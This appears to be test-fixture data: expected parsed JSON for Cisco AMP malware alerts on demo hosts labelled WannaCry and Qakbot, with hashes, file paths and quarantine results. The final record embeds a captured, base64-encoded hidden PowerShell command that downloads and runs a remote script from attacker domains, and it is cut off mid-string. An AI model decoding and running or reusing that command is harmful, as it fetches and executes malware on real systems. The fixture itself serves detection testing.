+ ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 718000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24355, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25559, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 29323, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30524, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 713000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 31725, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336645", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "120C.tmp", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 35438, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336644", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "2f99e3456dc1d26f77c52b2119fde92f", + "file.hash.sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 36775, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "cisco.amp.bp_data.audit": false, + "cisco.amp.bp_data.details.actions": [ + { + "action": "end_process", + "end_ts": 1602033881808, + "params": [ + "10724" + ], + "start_ts": 1602033881805, + "status": "success" + } + ], + "cisco.amp.bp_data.details.eng_epoch": 1, + "cisco.amp.bp_data.details.eng_ver": "0.9.0.104", + "cisco.amp.bp_data.details.matched_activity.events": [ + { + "process:start": { + "app": "powershell.exe", + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAf